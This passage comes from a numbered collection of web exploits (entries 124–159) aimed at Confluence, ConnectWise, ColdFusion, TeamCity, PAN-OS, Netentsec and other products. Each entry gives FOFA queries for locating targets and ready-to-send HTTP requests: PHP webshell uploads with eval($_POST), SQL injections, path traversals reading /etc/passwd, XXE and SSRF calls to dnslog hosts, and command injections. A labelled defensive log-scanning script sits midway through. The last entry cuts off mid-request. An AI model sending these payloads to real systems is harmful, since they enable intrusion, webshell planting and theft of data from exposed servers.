POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>


http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--


128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp


CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--


134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded


dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -


142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip


146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close


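A defender-side check for the request shapes that recur in entries 122, 126, 129, 132 (the CVE-2024-27199 paths), 137 to 140 and 147: dot-dot segments in the path or inside a parameter, a base64-carrying sql parameter that decodes to a statement, and time-based or error-based injection functions such as SLEEP() and EXTRACTVALUE() in the query string. This is an added example in Python and not part of the original compilation; the access-log lines it scans are constructed here in the common combined-log shape, and the parameter names it tries to base64-decode (sql, query, q) are an assumption of this example.

```python
"""Access-log scan for the request patterns collected above (added example).

Assumptions, not from the page: combined/NCSA log format, and the parameter
names in ENCODED_SQL_PARAMS as the places where an application may carry
base64-encoded SQL.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines mirroring the request shapes listed in this compilation.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2024:10:00:01 +0000] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1024
10.0.0.5 - - [01/Jun/2024:10:00:02 +0000] "GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1" 200 512
10.0.0.5 - - [01/Jun/2024:10:00:03 +0000] "GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1" 200 77
10.0.0.5 - - [01/Jun/2024:10:00:04 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 3000
10.0.0.5 - - [01/Jun/2024:10:00:05 +0000] "GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" 200 2200
10.0.0.6 - - [01/Jun/2024:10:00:06 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
# A ".." segment bounded by slashes/backslashes or by the ends of the string.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# Functions that time-based and error-based injections rely on.
SQL_FUNC_RE = re.compile(r'\b(sleep|pg_sleep|benchmark|extractvalue|updatexml)\s*\(', re.I)
SQL_STMT_RE = re.compile(r'^\s*(select|union|insert|update|delete|drop|alter)\b', re.I)
ENCODED_SQL_PARAMS = ('sql', 'query', 'q')  # assumption: names worth base64-decoding


def parse_log_line(line):
    """Split one combined-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'], rec['query'] = parts.path, parts.query
    return rec


def has_path_traversal(path):
    """Check the path as sent plus one and two rounds of percent-decoding,
    so /res/%2e%2e/ and double-encoded %252e%252e are both caught."""
    candidates = {path, unquote(path), unquote(unquote(path))}
    return any(TRAVERSAL_RE.search(c) for c in candidates)


def traversal_in_query(query):
    """Dot-dot segments inside a parameter value (entry 129's file_name)."""
    for values in parse_qs(query, keep_blank_values=True).values():
        if any(TRAVERSAL_RE.search(unquote(v)) for v in values):
            return True
    return False


def has_sql_function_call(query):
    return bool(SQL_FUNC_RE.search(unquote(query)))


def decoded_sql_statements(query):
    """Base64-decode the parameters an app might use to smuggle SQL (entry 122)
    and return those that decode to a statement."""
    found = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() not in ENCODED_SQL_PARAMS:
            continue
        for value in values:
            try:
                text = base64.b64decode(value, validate=True).decode('utf-8')
            except (binascii.Error, UnicodeDecodeError, ValueError):
                continue  # not base64, or not text: nothing to decode
            if SQL_STMT_RE.match(text):
                found.append(text)
    return found


def classify_request(target):
    """Return the list of reasons a request target looks like one of the patterns above."""
    parts = urlsplit(target)
    reasons = []
    if has_path_traversal(parts.path):
        reasons.append('path-traversal')
    if traversal_in_query(parts.query):
        reasons.append('traversal-in-parameter')
    if has_sql_function_call(parts.query):
        reasons.append('sqli-function-call')
    for stmt in decoded_sql_statements(parts.query):
        reasons.append('base64-sql:' + stmt)
    return reasons


def scan_log(text):
    """Yield (line number, source address, path, reasons) for every flagged line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rec = parse_log_line(line)
        if rec is None:
            continue
        reasons = classify_request(rec['target'])
        if reasons:
            hits.append((lineno, rec['src'], rec['path'], reasons))
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Feed scan_log() the contents of a real access log to use it. The path check deliberately runs on the request as sent rather than on a normalised path, because these traversals work precisely where the application normalises differently from whatever sits in front of it; the second unquote() round is what catches double-encoded dots.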
148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}


151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip


153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config


Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}


Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd


154. Tianwell (天维尔) fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}


155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--


Visit the echoed file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
